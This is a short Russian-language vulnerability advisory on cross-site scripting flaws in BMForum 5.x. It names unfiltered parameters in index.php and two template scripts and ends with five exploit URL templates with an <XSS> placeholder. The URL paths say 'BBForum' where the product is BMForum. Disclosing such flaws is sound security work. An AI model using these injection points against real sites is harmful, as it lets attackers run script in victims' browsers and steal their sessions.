Программа: BMForum 5.x
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "outpused" сценарием index.php, в параметрах "footer_copyright"
и "verandproname" сценарием newtem/footer/bsd01footer.php, и в параметрах "topads"
и "myplugin" сценарием newtem/header/bsd01header.php. Атакующий может выполнить
произвольный сценарий в браузере жертвы в контексте безопасности уязвимого
сайта.
Эксплоит:
http://[target]/[BBForum_path]/index.php?outpused=<XSS>
http://[target]/[BBForum_path]/newtem/footer/bsd01footer.php?footer_copyright=<XSS>
http://[target]/[BBForum_path]/newtem/footer/bsd01footer.php?verandproname=<XSS>
http://[target]/[BBForum_path]/newtem/header/bsd01header.php?topads=<XSS>
http://[target]/[BBForum_path]/newtem/header/bsd01header.php?myplugin=<XSS>
